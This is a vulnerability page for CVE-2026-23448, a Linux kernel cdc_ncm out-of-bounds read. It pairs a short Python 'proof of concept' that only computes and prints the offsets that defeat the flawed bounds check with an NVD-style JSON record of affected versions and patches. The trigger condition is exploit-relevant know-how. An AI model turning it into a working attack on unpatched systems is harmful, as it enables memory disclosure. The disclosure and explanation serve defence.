CVE-2026-23448

import struct # Proof of Concept for CVE-2026-23448 # This script demonstrates the logic to construct a malicious NTB packet # that triggers the out-of-bounds read in cdc_ncm_rx_verify_ndp16. def create_malicious_ntb_logic(): # Simulate the buffer size (skb_in->len) total_buffer_size = 400 # Structure sizes based on Linux kernel definitions # struct usb_cdc_ncm_ndp16 size is 8 bytes ndp_header_size = 8 # struct usb_cdc_ncm_dpe16 size is 4 bytes dpe_size = 4 # Scenario: Place NDP (NDP16) near the end of the buffer (large wNdpIndex) # We want to trick the second bounds check. # Flawed check: (sizeof(ndp16) + nframes * sizeof(dpe16)) <= skb_in->len # Real condition: (ndpoffset + sizeof(ndp16) + nframes * sizeof(dpe16)) > skb_in->len # Let's set ndpoffset to 390 (near the end of 400 byte buffer) ndpoffset = 390 # Let's try to fit 5 DPE entries (20 bytes) nframes = 5 # Calculate the size the flawed check sees flawed_check_size = ndp_header_size + (nframes * dpe_size) # Calculate the actual end offset of the data actual_end_offset = ndpoffset + ndp_header_size + (nframes * dpe_size) print(f"[*] Total Buffer Size: {total_buffer_size}") print(f"[*] NDP Offset: {ndpoffset}") print(f"[*] Number of Frames (DPE): {nframes}") print(f"[*] Flawed Check Size: {flawed_check_size} (<= {total_buffer_size} -> Check Passes)") print(f"[*] Actual End Offset: {actual_end_offset} (> {total_buffer_size} -> Out-of-Bounds Read)") if actual_end_offset > total_buffer_size and flawed_check_size <= total_buffer_size: print("[+] Successfully generated logic to trigger CVE-2026-23448") else: print("[-] Failed to trigger condition with current parameters") if __name__ == "__main__": create_malicious_ntb_logic()

{"cve": {"id": "CVE-2026-23448", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:30.863", "lastModified": "2026-05-21T00:44:10.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: cdc_ncm: add ndpoffset to NDP16 nframes bounds check\n\ncdc_ncm_rx_verify_ndp16() validates that the NDP header and its DPE\nentries fit within the skb. The first check correctly accounts for\nndpoffset:\n\n if ((ndpoffset + sizeof(struct usb_cdc_ncm_ndp16)) > skb_in->len)\n\nbut the second check omits it:\n\n if ((sizeof(struct usb_cdc_ncm_ndp16) +\n ret * (sizeof(struct usb_cdc_ncm_dpe16))) > skb_in->len)\n\nThis validates the DPE array size against the total skb length as if\nthe NDP were at offset 0, rather than at ndpoffset. When the NDP is\nplaced near the end of the NTB (large wNdpIndex), the DPE entries can\nextend past the skb data buffer even though the check passes.\ncdc_ncm_rx_fixup() then reads out-of-bounds memory when iterating\nthe DPE array.\n\nAdd ndpoffset to the nframes bounds check and use struct_size_t() to\nexpress the NDP-plus-DPE-array size more clearly."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.8", "versionEndExcluding": "6.6.130", "matchCriteriaId": "EFE88BB9-3F34-4285-87EF-4D5EF076BBB0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.78", "matchCriteriaId": "28D591F5-B196-4CC9-905C-DC80F116E7A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.20", "matchCriteriaId": "E5571059-6552-48E7-9BEF-3E358C387171"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.10", "matchCriteriaId": "96D34333-38BE-4414-9E79-6EB764329581"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2aa8a4fa8d5b7d0e1ebcec100e1a4d80a1f4b21a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/403f94ddcb36c552fbef51dea735b131e3dcde8b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/789204f980730258c983102c027c375238009c80", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/dce9dda0e3707e887977db44407989e9ead26611", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f1c7701d3ac91b62d672c13690cf295821f0d5c3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}